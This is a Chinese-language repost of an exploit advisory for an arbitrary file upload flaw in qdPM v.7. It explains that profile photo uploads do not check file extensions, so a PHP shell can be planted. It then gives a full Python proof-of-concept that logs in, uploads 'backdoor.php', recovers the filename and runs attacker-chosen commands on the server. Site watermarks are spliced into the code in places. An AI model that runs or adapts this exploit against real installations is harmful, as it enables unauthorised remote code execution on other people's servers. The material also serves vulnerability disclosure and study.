标题 qdPM v.7 Arbitrary File upload 作者: loneferret 影响版本: 7 开发者网址: http://qdpm.net/ 测试系统平台: Winddows XP / XAMPP 程序介绍: # Free project management tool for small team # qdPM is a free web-based project management tool suitable for a small team working on multiple projects. # It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact # using a Ticket System that is integrated into Task management. 缺陷分析: # Application does not verify the file's extension when uploading an image for a user's profile. # Making it possible to upload a small php shell, and accessing it remotely. # Note(s): # One needs a valid user account to upload the file. (Client will do) # No need to be authenticated to access the file. 上传文件: 登录后再这里上传: # Page: /qdPM/index.php/home/myAccount # Access file: # File can be found here: # /qdPM/uploads/users/<filename> # # Note the filename will contain a random number. One need to # to look at the source code from the browser to find it. # For example: <input type="file" name="users[photo]" value="171793-backdoor.php" id="users_photo" /> ----- python script ----- #!/usr/bin/python import re, mechanize import urllib, sys HdhCmsTest2cto测试数据 print "\n[*] qdPM v.7 Remote Code Execution" print "[*] Vulnerability discovered by loneferret" print "[*] Offensive Security - http://HdhCmsTestoffensive-security测试数据\n" if (len(sys.argv) != 3): print "[*] Usage: poc.py <RHOST> <RCMD>" exit(0) rhost = sys.argv[1] rcmd = sys.argv[2] # Login into site try: print "[*] Loging in ." br = mechanize.Browser() br.open("http://%s/qdPM/index.php/home/login" % rhost) assert br.viewing_ html () br.select_form(name="UsersForm") br.select_form(nr=0) br.form['login[email]'] = "loneferret@test测试数据" br.form['login[password]'] = "123456" print "[*] Hope this works" br.submit() except: print "[*] Oups..." exit(0) # Upload malicious file try: print "[*] Uploading shell .." br.open("http://%s/qdPM/home/myAccount" % rhost) assert br.viewing_html() br.select_form(name="UsersAccountForm") br.select_form(nr=0) br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="users[photo]") br.submit(nr=0) except: print "[-] Upload didn't work." exit(0) # Get file name once saved try: br.select_form(name="UsersAccountForm") for form in br.forms(): filename = form.controls[9].value print "[*] Filename is now: " + filename url = "http://%s/qdPM/uploads/users " % rhost url += "/%s?cmd=%s" % (filename,rcmd) print "[*] Executing command:\n" resp = urllib.urlopen(url) print resp.read() except: print "[-] Oups..." exit(0)
查看更多关于qdPM v.7任意文件上传 - 网站安全 - 自学php的详细内容...